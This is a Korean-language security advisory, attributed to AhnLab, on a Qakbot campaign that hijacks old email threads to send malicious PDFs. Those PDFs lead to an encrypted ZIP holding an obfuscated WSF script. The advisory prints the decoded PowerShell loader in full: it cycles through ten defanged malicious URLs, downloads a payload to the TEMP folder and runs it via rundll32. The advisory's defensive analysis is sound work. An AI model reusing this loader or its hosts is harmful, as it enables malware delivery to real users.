폭탄 품은 회신 메일 도착? 칵봇 악성코드 주의!

최근 뱅킹형 악성코드 ‘칵봇(Qakbot)’이 국내 사용자를 대상으로 유포되고 있다. 안랩 분석팀이 확인한 결과, 이번에는 원본 메일을 악용하는 이메일 하이재킹 기법이 사용됐다. 실제 사례를 바탕으로 칵봇 악성코드의 유포 과정을 자세히 알아보자.

 

 

칵봇 악성코드는 [그림 1]과 같이 기존에 수신된 정상 이메일을 가로채 본문에 악성 PDF 파일을 첨부한 다음, 사용자에게 회신 또는 전달한다. 표적은 원본 이메일의 수신자와 참조자이다.

 

[그림 1] 악성 PDF가 첨부된 메일 본문(1)​

 

안랩 분석팀에 따르면, 원본 이메일을 주고받은 시점은 2018~2022년으로 최근은 아니다. 메일 본문은 원본 메일과 연관성이 떨어지지만, 첨부 파일 클릭을 유도하는 내용으로 작성됐다. 수신자는 이를 정상적인 회신 메일로 판단해 아무 의심 없이 첨부 파일을 실행하게 된다.

 

[그림 2] 악성 PDF가 첨부된 메일 본문(2)

 

[그림 3] 악성 PDF가 첨부된 이메일(3)​

 

​이메일에 첨부된 PDF 파일명은 ‘UT.PDF’, ‘RA.PDF’, ‘NM.PDF’와 같이 자동화로 만든 듯한 랜덤문자의 형태를 띤다. 이 PDF 파일에는 아래와 같이 마이크로소프트 애저(Microsoft Azure) 로고와 함께 ‘Open’ 버튼 클릭을 유도하는 문구가 적혀있다.

‘Open’ 버튼을 클릭하면 악성 URL로 연결되며, 이때 암호화된 ZIP 파일이 다운로드된다. 암호는 PDF 파일 본문에 기재된 ‘Password 755’이다.

 

[그림 4] 메일에 첨부된 PDF 파일 실행 화면

 

[그림 5] PDF 파일의 내부 URL에서 다운로드되는 압축 파일


[그림 5]의 WSF 파일을 열면 [그림 6]과 같이 안티바이러스의 진단을 우회하기 위해 더미 텍스트와 함께 난독화된 스크립트 코드를 확인할 수 있다. 더미 텍스트란 아무 의미가 없는 문장을 말한다. 유의미한 스크립트 코드는 <job> 태그 뒤에 존재한다.


[그림 6] 더미 데이터와 함께 난독화 된 WSF 스크립트


WSF 파일을 실행하면 파워셸(PowerShell) 프로세스를 통해 암호화된 데이터 커맨드를 실행한다. 해당 데이터를 복호화하면 다음과 같다.

 

powershell.exe” -ENC “Start-Sleep -Seconds 2; $Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); foreach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}} catch {Start-Sleep -Seconds 2;}}​

 

여기서 공격자가 칵봇 바이너리를 TMP 경로에 ‘undersluice.Calctuffs’ 파일명으로 다운로드한 후 ‘rundll32.exe’ 프로세스로 실행한 것을 알 수 있다.

 

이 밖에, 다수의 악성 메일이 이번 사례와 유사한 형태로 유포되고 있어 출처가 불분명한 메일은 가급적 열람해서는 안 되며, 현재 사용 중인 안티바이러스를 최신 버전으로 업데이트할 것을 권장한다.

 

 

출처 : AhnLab

02-553-2331
견적 요청
카카오톡 문의